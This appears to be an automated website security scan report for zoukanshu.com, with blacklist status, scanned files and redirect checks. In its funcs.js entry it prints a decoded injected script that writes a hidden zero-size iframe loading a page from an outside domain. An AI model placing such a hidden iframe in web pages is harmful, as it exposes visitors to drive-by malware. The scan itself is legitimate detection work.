Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zoukanshu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zoukanshu.com/ | 200 OK Content-Length: 62614 Content-Type: text/html | clean |
http://zoukanshu.com/Skin/Default/funcs.js | 200 OK Content-Length: 5467 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. function drop_mouseover(pos){ try{window.clearTimeout(timer);}catch(e){} } function drop_onclick(pos){ if(document.getElementById(pos+"Sel").style.display=='none'){document.getElementById(pos+"Sel").style.display='block';}else {document.getElementById(pos+"Sel").style.display='none';};return false; } function drop_mouseout(pos){ var posSel=document.getElementById(pos+"Sel").style.display; if(p ...[3966 bytes skipped]... Decoded script: var l = function(x){return String.fromCharCode(x)} var l = function(x){return String.fromCharCode(x)} O=function(m){return String.fromCharCode(Math.floor(m/10000)/99);} O=function(m){return String.fromCharCode(Math.floor(m/10000)/99);} document.writeln("<iframe src=\"http://winvvv.com/cs.html\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"); document.writeln("<iframe src=\"http://winvvv.com/cs.html\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"); <iframe src="http://winvvv.com/cs.html" width="0" height="0" frameborder="0"></iframe> | ||
http://zoukanshu.com/search.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
http://zoukanshu.com/User/User_DY.Asp?ID=7 | 200 OK Content-Length: 1325 Content-Type: text/html | clean |
http://zoukanshu.com/User/\"User\/GetPass.asp\" | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://zoukanshu.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zoukanshu.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 04 Mar 2015 04:46:57 GMT
Server: Microsoft-IIS/6.0
Content-Length: 62614
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDBSCRS=OINAKMNCFLFDAMNBMCKCCIFI; path=/
X-Powered-By: ASP.NET
...62614 bytes of data.
GET / HTTP/1.1
Host: zoukanshu.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 04 Mar 2015 04:46:57 GMT
Server: Microsoft-IIS/6.0
Content-Length: 62614
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDBSCRS=OINAKMNCFLFDAMNBMCKCCIFI; path=/
X-Powered-By: ASP.NET
...62614 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zoukanshu.com
Referer: http://www.google.com/search?q=zoukanshu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zoukanshu.com
Referer: http://www.google.com/search?q=zoukanshu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.